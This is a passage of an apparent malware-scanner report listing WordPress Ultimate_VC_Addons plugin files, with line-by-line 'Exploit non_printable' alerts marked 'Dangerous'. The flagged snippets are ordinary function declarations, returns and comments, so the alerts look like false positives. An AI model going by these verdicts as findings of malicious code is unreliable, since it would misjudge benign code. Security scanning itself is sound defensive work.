</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_modal_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 395</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 396</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 537</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_modal_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 538</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_is_medium_device</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 70</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$is_medium</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">modal_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_433").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_headings.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 36.28 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 15</span><br><table id="file_434" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">ultimate_heading_spacer</span><span style="color: #007700">( </span><span style="color: #0000BB">$wrapper_class</span><span style="color: #007700">, </span><span style="color: #0000BB">$wrapper_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$icon_inline </span><span style="color: #007700">) { </span><span style="color: #0000BB">$ult_heading_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'spacer'</span><span style="color: #007700">] = </span><span style="color: #DD0000">'<div class="uvc-heading-spacer ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$wrapper_class </span><span style="color: #007700">. </span><span style="color: #DD0000">'" style="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$wrapper_style </span><span style="color: #007700">. </span><span style="color: #DD0000">'">' </span><span style="color: #007700">. </span><span style="color: #0000BB">$icon_inline </span><span style="color: #007700">. </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">; return</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Heading Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Heading module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Ultimate Heading Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_headings_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Ultimate Heading Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_headings_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Heading Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_headings_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 847</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 857</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_heading_spacer</span><span style="color: #007700">( </span><span style="color: #0000BB">$wrapper_class</span><span style="color: #007700">, </span><span style="color: #0000BB">$wrapper_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$icon_inline </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ult_heading_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'spacer'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 865</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_434").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_animation.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.50 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_435" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">animate_shortcode_mapper</span><span style="color: #007700">() { if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'name' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Animation Block'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ultimate_vc' </span><span style="color: #007700">), </span><span style="color: #DD0000">'base' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'ult_animation_block'</span><span style="color: #007700">, </span><span style="color: #DD0000">'icon' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'animation_block'</span><span style="color: #007700">, </span><span style="color: #DD0000">'class' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'animation_block'</span><span style="color: #007700">, </span><span style="color: #DD0000">'as_pare</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Animation Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Animation module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">animate_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">animate_shortcode_mapper</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 90</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_435").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_pricing_tables.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.08 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_436" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_Pricing_Table</span><span style="color: #007700">(); if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Pricing' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ultimate_Pricing </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Pricing Tables Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Pricing Tables module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Pricing Tables Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">price_table_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Pricing Tables Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_pricing_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 623</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Pricing Tables Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 629</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_pricing_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #0000BB">$design_func </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 664</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 670</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_436").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_info_banner.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 34.85 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_437" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Info_Banner' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_info_banner </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Info_Banner</span><span style="color: #007700">(); } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Info_Banner' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakery</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
